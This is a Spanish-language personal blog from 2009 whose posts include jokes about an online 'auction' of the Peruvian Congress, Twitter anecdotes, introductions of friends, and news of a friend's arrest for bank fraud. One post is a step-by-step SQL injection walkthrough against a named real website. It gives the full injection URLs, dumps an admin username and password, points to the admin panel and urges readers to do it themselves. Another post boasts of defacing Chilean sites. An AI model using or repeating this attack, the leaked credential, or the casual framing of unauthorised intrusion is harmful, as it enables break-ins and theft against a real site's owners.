domingo, 4 de octubre de 2009

¿Comprarían el Congreso?

Hoy Domingo en mi poco tiempo libre encendí la computadora y como siempre me pongo a navegar un poco, siendo más preciso ingresé al foro PeruNice.com antes SoyForero.com y veo en la categoría noticias "Congreso de la República en venta" publicado por mi gran amigo "Diego Bardalez" al ver sólo el titulo pues me causó bastante gracia que alguien haya subastado en congreso en Kotear.pe. ¡Qúe Ingenuo! el que lo hizo me dije yo mismo..


En fín después de haber visto el anuncio me puse a leer rápidamente todas las subastas hechas por los usuarios, y hay algunos comentarios que estuvieron tan graciosos que los mencionaré en las siguientes líneas:
* Por facial_55
saben yo no daria ni un sol con los otorongos que hay coNla ROBA LUZ,EL COMO POLLO,EL MATA PERRO,LA COCALERA, EL INVASOR DE TERRENOS,EL QUE LO APUÑALA SU MUJER,LA PEDICURISTA, EL LAVANDERO, la hijita de papi no se lucianita. AAy me quedo ahi porque me falta tiempo para seguir poniendo nombres ..... OTORONGASOS
* Por peruanosincero
Hola soy propietario de una chancheria clandestina , de esas donde los cerdos se alimentan con basura,traigo una propuesta que no puedes rechazar,te doy una porcion de chicharrones,espero que aceptes mi oferta , si no, Caballero, así es la competencia.
* Por z_martin
TE LO COMPRO,LO CONVERTIRE EN UN LUGAR DE TRABAJO ASI Q SACAME A TODOS ESOS VAGOS X Q YA ME CANSE DE DARLES DE TRAGAR
* Por Peruano_con
A cuento el congresista ? vende pollos , toy por abrir mi polleria y lo quiero para sea mi mayorista ps , y tbm kiero al tio mata perros para ponerlo de wuachi para k se baje a todos los PERROS que pasen por hay....tbm a la congresista que le gusta los pies ...la kiero pa k me lave las patitas del pollo pal aguadito ....y tbm a congresista k le gusta la grifa para vender en mi polleria mi tesito de coca:)!
Así como algunos brindan opiniones serias bueno tambien hay usuarios que escribieron que darían lo que fuera por Lucianita sola; sería bueno si saldría sola, ¿quién no la compraría?
* Por callife
Era verdad, enserio lo vendias, lo acabo de ver, sale lucinita sola? a cuanto?
* Por jfernando
ya la ultima oferta te doy mi play 2 por luciana!
* Por informatico
te hago una oferta, pero solo por lucianita..!!! por los demas no te doy ni las gracias :D
Otros que subastaron al song de la música de los Nosequien y Los Nosecuantos:
* Por CaViaR
ir.pe/cvr ir.pe/cantuta por 5 lukas (del 85) me compro un congresista, un juez sm, un par de periodistaaas... que siga el remate!!
Bueno en fín aquí hay dos subastas que sobresalen de entre todas:
* Por Leonardo9113
Estimado Vendedor, somos de la oficina de la Defensa al Consumidor y lamentamos informarle que esta usted cometiendo un delito, no puede ofrecer un producto tan deficiente, podrido y en tan mal estado. Gracias
* Por EWAY
Brother te puedo pagar con chapitas de gaseosa quiero comprar al congresista come pollo y al congresista roba luz, ah y tambien me das a uno de esos cabrones nacionalistas para tener surtidito mi corralito de animales... hasta cuando señores tendremos ese tipo de congresistas basta ya por favor.!
Qué ocurrencia del que empezó la subasta.. en verdad me pareció muy gracioso así como la niña inglesa que subasto a su Abuela en EbAy.. jajaja

Bueno me despido hasta mi próximo post, que estoy seguro que sera dentro de unos meses o algo por el estilo ya que ahora TRABAJO y no me da mucho tiempo para bloguear, twittear; que la verdad son cosas que me gusta hacer bastante.

lunes, 7 de septiembre de 2009

Injectión SQL con Gothic-X

WEB: http://directinformatica.es/
METODO DE ATAQUE: SQL INJECTION

Bueno empesaremos con buscar la parte de la web donde es vulnerable en este caso sera en:
http://directinformatica.es/detalle.php?id=
Verificamos si es vulnerable haciendo una consulta con solo ponerle ( ' ) una coma, efectivamente este sitio es vulnerable a sql, ¿como sabemos? por que nos arrojo un mensaje de error el cual es el siguiente:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gedraqxj/public_html/detalle.php on line 35
El cual nos indica que es vulnerable, bueno ahora buscaremos cuántas columnas tiene el sitio agregando lo siguiente al final de la url de la web:
( detalle.php?id=-1+union+select+0,1,2,3,4,...,
En este caso tiene 9 columnas osea quedaria de la siguienteforma.
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,8--
Entrando veremos que nos arrojo unos numeritos en la web en este caso fueron : 8 , 4 , 2 .

ya estando aqui veremos si la web tiene information schema de manera que quede de esta forma agregando al final
+from+information_schema.tables--
y reemplazando cualquiera de los numeros nos arrojo la web por table_name quedando la url de la aiguiente manera:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema--
Perfecto nos arrojo un texto CHARACTER_SETS el cual es una tabla y con eso confirmamos que tiene information schema, ahora buscaremos la tabla de usuario, usuarios o admin agregando al final:
+limit+1,1--
y quedaria de esta forma:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+1,1--
Ahora para que encontremos la tabla deseada avansaremos en el primer uno del limit de la siguiente manera.
+limit+2,1--
Hasta encontrar la tabla deseada. en esta web se tubo que avansar 20 para la tabla deseada y quedo de la siguiente manera:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+20,1--
Y nos dio como resultado: adm_usuario

Ahora como ver lo que esta dentro de la tabla, osea ver las columnas, bueno primero convertiremos la tabla a hexadecimal usualmente uso esta herramienta:

http://hwagm.elhacker.net/php/sneak.php

Bueno nos dio como resultado:
61646d5f7573756172696f
Al final de la url de la injection aditaremos el final reemplazando
.tables+limit+20+1--
por
columns+where(table_name=0xaquitabalaenhex)--
y

Donde tenemos table_name lo reemplazamos por column_name y nos quedaria de la siguiente manera:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,column_name+from+information_schema.columns+where(table_name=0x61646d5f7573756172696f)--
Y vemos que nos arroja las columnas y para ir encontrando las columnas deseadas avansamos con +limit+1,1-- cambiando el 1 por 2 y asi susesivamente hasta encontrar las columnas deseadas.

En esta web encontramos las siguientes columnas:
id_user, id_tipo, nomb_user , nick_user , pass_user , acti_user
Bién ya con esas tenemos las esenciales que son: nomb_user y pass_user.

Ahora como vemos dentro de las columnas? bueno solo reemplazamos el final despues de +from+ y agregamos el nombre de la tabla que es adm_usuario y donde tenemos column_name reemplazamos por concat(columna,0x3a,columna) el 0x3a esta en hexadecimal y es ( : ), entonces nos quedaria de la siguiente manera nuestra url:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,concat(nick_user,0x3a,pass_user)+from+adm_usuario--
Y nos arrojara nuestra informacion deseada que es la siguiente:
admin:matias1
Ahora solo nos falta encontrar el admin panel, en la siguiente web es:
http://directinformatica.es/cms/
Así nos logeamos y hacemos lo que tengamos que hacer, creo que este final es más fácil de hacer.

Háganlo ustedes mismos y sí que es recontra facilísimo..

Con un poco de ayudita de Gothic-X

domingo, 6 de septiembre de 2009

Dr. Neox presenta su Blog

Ahora que está de moda los blogs, los concursitos huachafos como 20 Blogs y entre otros más, tengo el gusto de presentar a un amigo a quién conocí hace muy poco y también a quién no conocí aún, pero si tuvimos la gran oportunidad de compartir y participar en Élite-Peruvian y de quién me hice muy amigo hasta tener en planes la construcción de una Red Social en base a un script que modificariamos y el cuál no llego a concretarse, diría yo por falta de interés de él mismo ya que yo si tuve las ganas de levantar esa Red Social.

Bueno sin más habladurías hoy me conecto al Messenger después de dos días sin internet y llego a ver en su mensaje personal la dirección de un blog el cuál investigué un poco y así supe que era de él (Dr. Neox)

Vaya que al ver su blog, y al sólo pensar en él (Dr. Neox) me viene a la memoria que algunos días nos quedamos de madrugada sólo por joder (ownear) algunas webs chilenas y hasta llegamos a clonar la web de una Universidad Chilena que aún tengo los archivos (porsiacaso).

PD: Aún guardo capturas de pantalla de algunas webs owneadas con Dr. Neox para que sea más creible les dejo una de las tantas que hicimos:
Imagen de una web chilena que owneamos con Dr. Neox and ca0s1 a eso de las 11.40 pm cuando el festín recien empezaba.. click para ampliar la imagen..

Ahora tengo el gusto de presentar a un amigo más (Dr. Neox) con su blog personal, si quieren visitar su blog y leer sus ocurrencias pues les dejo el link de su blog AQUI.
La imagen de su Blog fué sacado por petición del mismo Dr.Neox
URL de su Blog: http://drneox.diosdelared.com

Una partecita de la presentación de su blog la cuál me gusto es en donde menciona lo siguiente:
supongo que a escribir , linkear, posicionarme en google, ganar dinero, donarlo a los niños pobres e irme de mochilero por el mundo jajajaj.
bueno bienvenidos mutantes.
Bién es todo por hoy. un post rapidito para presentar a mi amigo Dr. Neox que aún le estoy esperando a que me diga la fecha de la conferencia de Seguridad que me habló. Apropósito ya que andas con tu blog haber si te animas a twittear.

miércoles, 2 de septiembre de 2009

Loco Twitter

Jamás pense esta sensación que me iba a causar la famosa red social llamada Twitter, cuando en principios escuchaba del Twitter y toda esa nota soliía decir "cosa de locos" "pérdida de tiempo", pero mirame ahora ya casi llego a los 700 upadates, pues sí que estaba recontra equivocado.

En fín no tengo idea de lo que se tiene que escribir, se dicen que twitter es una unión de microblogging y red social, pero yo lo utilizo más personalmente en caso cómo este.

- Encuentro un artículo interesante y si es posible lo comparto ayá si no lo llega a leer nadie, me importa un bledo.

- Las cosas que me pasan en el trabajo, con los clientes, con mis servidores, con mis blogs y/o webs.

- A veces ántes de irme a ducharme escribo updates como éste, así cuando revise mi twitter se vé que día fué el más próximo cuando me bañé. Y me digo "ya me toca bañarme creo" jajaja.

- Cuando @vagalli se va de compras y se tira todo el billete en Metro, Tottus y otros Hiper Mercados.

- Antes de ir a comer ó cuando @vagalli no cocina y a veces cuando tengo que cocinarme sopa instantánea, y hasta a veces menciono lo que cómo.

- Hasta a veces lo utilizo como chat, dado esto recibí un mensaje cómo éste:
@ztefany: en otro pais shhhhh haha twitter no es un chat :p
- Y me olvidaba lo mas candente, menciono algunas cuando tengo ganas y cuando hay sexo.

En fín escribo lo que me da la regalada gana.. no sé si esté bien, pero es mi twitter y puedo utilizarlo cómo más me plazca así como lo és este mi blog personal.

Lo más importante del twitter lo menciono rápido que me da flojera escribir demasiado.

Al menos eh tenido la oportunidad de compartir updates con @peruinside, @Juan_Tolentino, @ztefany, @Pateador, @reynatello, @diegobardalez, @fradesin, @claroperu, @perucom, @Descuentos_Peru y con mi queridísima tía @vagalli aparte de verla a diario pues tengo que soportarle en el twitter (en mal momento le dije que creara su twitter) jajaja.

El twitter también me dió la oportundad de ganarme entradas para ir a los 25 años del rock en el parque de la exposición gracias a @perucom. Aunque me hubiera gustado comprarme la entrada que costaba 10 soles y no ir hasta Miraflores donde queda la sede de @perucom, aquí los gastos que hice.
Si me hubiera comprado la entrada:
Entrada: 10 Soles
Pasaje de Huaral a Lima al Parque de la Expo (ida y vuelta): 16 Soles
Otros cómo Chicles, Cigarritos, Cervezita: 10 Soles

Ganandome la entrada gasté:
Pasaje de Huaral a Lima a Miraflores (ida y vuelta): 27 Soles
Otros cómo Chicles, Cigarritos, Cervezita: 10 Soles
Si se dan cuenta gasté un sol más ganandome la entrada, en todo caso me hubiera comprado la entrada, pero yo me digo "El twitter es el twitter" no me importa haber pagado más, haber caminado, pero la emoción de ir a recoger una entrada que gané por twittero (jajaja).

Pues me vale mucho más, de todas maneras disfruté del concierto estuvo bravazo aunque no ví hasta el final me perdí a los grupos Amén (no importa), Los Mojarras (este si me hubiera gustado verlos) lamentablemente los carros para Huaral no salen hasta la media noche por eso fué mi retirada muy temprano el cuál si disfruté viendo a Raúl Romero y su grupito aunque no quizo cantar Magdalena (jajaja), el grupo Río (bravazo), Micky Gonzales (bravazo con sus temas), Julio Andrade (bravazo con su tamarindo) y así entre otros.

Ahora me levanté encendí la pc y me doy cuenta que me acabo de ganar el pack promocional de la película Máncora (#mancora) que concierne un poster de la peli y dos polos el cuál sorteó @agendameperu y más tarde voy a ir a recogerla hasta Lince.

Ahora cuando gastaré en pasajes pero si vale la pena "Lo gané por twittero" jajaja (si que vale la pena).

Por este motivo le conté a @vagalli y escribió su update en el twitter diciendo que me odia (jajaja) pero sé que en verdad no es así.

Sé que algunos amigos que tengo como Regor y HellXoft no atracan twittear aquí una conversación recien te que tuve con uno de ellos cuando escrbía este post:
Regor dice:
*ala causa
ca0s1 dice:
*aki ps
*toy haciendo un nuevo post
*en mi blog
Regor dice:

*man y q ganas haciendo un blog?
ca0s1 dice:

*bueno.. nada, pero mato el tiempo
Regor dice:

*q aburrido matas el tiempo
ca0s1 dice:

*jajajaja
*asi es mi vida pues brother
Regor dice:

*azoo
*q aburrido
Me gusta cómo es mi vida entre blog y blogs, web y webs, trabajo y trabajos, twitter y updates, post y posts el cuál por ningún motivo del mundo lo cambiaría.

Sólo me queda agradecer a esta red social (Twitter) que me dió la oportunidad de ganarme lo mencionado ántes y tambien de poder aprender más cosas así como tambien conocer a otras personas.

Un saludo a todos los twitters y no se olviden de hacer follow a @ca0s1

martes, 1 de septiembre de 2009

Mi amigo Jhair

Hace poco me acabo de enterar de algo bastante lamentable para mí cómo para todos mis demás amigos, diría que me cayó como una patada en el estómago cuando me lo contó The.RjR.
Capturan a hackers por desviar cuentas bancarias

ICA|Chincha. Dos sujetos fueron puestos tras las rejas en circunstancias que realizaban operaciones vía internet con la finalidad de desviar dinero de cuentas bancarias a terceras personas en agravio de clientes del Banco de Crédito y otras entidades financieras del Perú.

Fue el personal de la División de Investigación de Delitos de Alta Tecnología (DIVINDAT) de la ciudad de Lima que con apoyo de efectivos de Inteligencia de la Seincri en Chincha, lograron ubicar y capturar -con las manos en la masa- a Elvis Manuel ****** (22) y Jhair ****** (19) en una cabina de internet de nombre "Djuanc@" en el Stand Nº 191 del Centro Comercial Vega, en la segunda cuadra del Jr. Italia.

Fuente: Diario Correo
La verdad me es muy lamentable poder leer esto y más de un amigo como Jhair, ahora otro más aparte del gran Alexis Atoche (Cyberalexis) y también del gran Diego Bardalez (SDM)

Sólo me gustaría poder ir a visitar a Jhair (BuGs) ahora que ya me enteré que fué traslado al Penal de Chincha, aunque ya lo estuve planeando con HellXoft.

Un hecho lamentable, que nunca tuve la oportunidad de llegar a tanto, por retirarme a tiempo; aunque sí tuve una historia que quizá lo cuente más adelante, ese fué el gran susto que me llevé el cuál hizo que me retirara de esto.

No se olviden de hacer follow en el twitter a: @ca0s1, @diegobardalez.

viernes, 14 de agosto de 2009

Encontré a FradeBlog.com

Bueno esta vez al parecer no tengo mucho de qué hablar pero sí.. me tomaré un poco de mi preciado y hoy hablare sobre mi gran amigo de la red FrAdE.. a quién conocí alguna vez en T4E.us cuándo todavía era un novato en la internet; vale decir que recien empezaba a sacar mi correo.. aya por los años 2002 si no mal recuerdo.

Bueno T4e.us me enseñó bastante en esos años.. recuerdo a algunos de los tantos amigos que hize fueron (LoPeZ, xCltsx, The.RjR, Cherito, usb, puntos suspensivos.. ya no recuerdo quienes más) pero si que era una comunidad muy grande.. con muchos usuarios en línea, funcionaba con el famoso vBulletin.. y el diseño celestito que lo hacía único.. bueno ya habra tiempo para explicarles más sobre T4e.us.

Sobre FrAde o Fraude cómo yo solía llamarle:

Edad: 20 años
Nickname: FrAdE
Blog personal: www.fradeblog.com
Facebook: www.facebook.com/frade
YouTube: www.youtube.com/fradesin
Twitter: www.twitter.com/fradesin

Después de haberles contado sobre mi gran amigo FrAdE.. pues ahora lo veo que tambien es uno más en la Blogesfera con su Blog personal, espero que te vaya muy bién con tu blog y bueno espero que tambien me admitas en el Messenger.. xD..


Ahí una toma de su Blog para el recuerdo.. Muchos saludos FrAdE..

miércoles, 12 de agosto de 2009

Ownearon a Frade

Ahora le tocó el turno a "Frade" jaja.. me pregunto si aún me querrá admitir en el Messenger..

Bién aquí el ya famoso "ImagesNice.Com" owneo a uno de los miembros "Élite" en su peor momento al parecer después fué después de haber salido a comer un calgo de gallina. Veamos que dice nuestro famoso amigo "Cherito".

Cherito dice:
. vomitó
. después de un calgo de gallina

Bueno haber que dice "Frade" después de esto..


Cómo es de esperarse algunos miembros Élite tambien saltaron a la burla aquí un poco de los comentarios que más resaltan en el famoso "ImagesNice.com":

# BuGs el 11 de Agosto, 2009 12:46 PM

aahahahha Gasparin esta borracho xDDD
a la mierda XD

# TheRjR el 11 de Agosto, 2009 1:42 PM

owned bb
algun dia te tenian q owned
primero fue nuwanda
despues tu
aora q dari de los dari lo ownearan
alaoz bb!!

# NuwanDa el 11 de Agosto, 2009 4:19 PM

sorry amigo, no debí tomarte la foto :(

# DarCangri el 11 de Agosto, 2009 5:16 PM

me gusta decirlo una y otra vez.. “Frae kagao” x)
Y yo que también me uní a dejar un comentario en el ImagesNice.com
# ca0s1 el 11 de Agosto, 2009 8:21 PM

JaJaJa.. Frade Owned.. ahora.. pe.. jajaja esa cara de mela.. jajaja
Frade esperamos tu visita..